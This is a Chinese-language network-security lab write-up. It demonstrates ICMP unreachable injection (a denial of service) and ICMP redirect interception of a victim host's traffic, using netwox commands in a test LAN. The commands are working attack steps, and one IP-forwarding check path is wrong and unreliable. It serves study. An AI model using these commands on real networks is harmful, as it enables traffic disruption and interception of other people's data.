HCIE（2）——ICMP攻击模拟

一、实验拓扑

二、拓扑介绍
局域网：172.24.8.0
攻击者kali：172.24.8.129
受害者win2003:172.24.8.253
PC2：172.24.8.254
外网主机：10.1.1.100

三、实验步骤
1）首先测试设备之间的连通性（win2003为例）



2）ICMP不可达，实现win2003主机访问外网的时候都出现目标主机不可达的情况
即只需要做到win2003在访问172.24.8.2网关时出现主机不可达即可。
使用netwox 82号工具来实现(可以同时开几个终端来增强效果)：

sudo netwox 82 -f "host 172.24.8.253"  -i "172.24.8.2"
-f：进行筛选
-i：目标地址

查看效果：

可以明显看到其中间断的出现了一些目标不可达的报文，说名实验成功。

3）ICMP重定向，实现当win2003访问外网时，需要先将报文交给攻击者kali后，再由kali转发到网关，最后再到外网主机。
实现这一目标，只需将将win2003的默认网关设为攻击者kali的主机地址即可，同时需要在kali上开启路由转发功能。
①开启路由转发功能

vim   /etc/sysctl.conf            //编辑sysctl.conf
	net.ipv4.ip_forward = 1     //设置为1
sysctl  -p /etc/sysctl.conf      //立即生效不需要重启
cat  /etc/sys/net/ipv4/ipv4_forward      //查看值是否为1，为1表示修改完成，为0表示没有修改

②使用netwox的86号工具来实现

sudo netwox 86 -f "host 172.24.8.253" -g "172.24.8.129"  -i "172.24.8.2"
-f：路由筛选
-g：新指定的网关地址
-i：原来的网关地址

在攻击者kali上面进行抓包，可以抓到ICMP重定向的包和要传输的数据包，也就是说，可以在kali上面获取从win2003发往外网的数据包。

实验成功！！！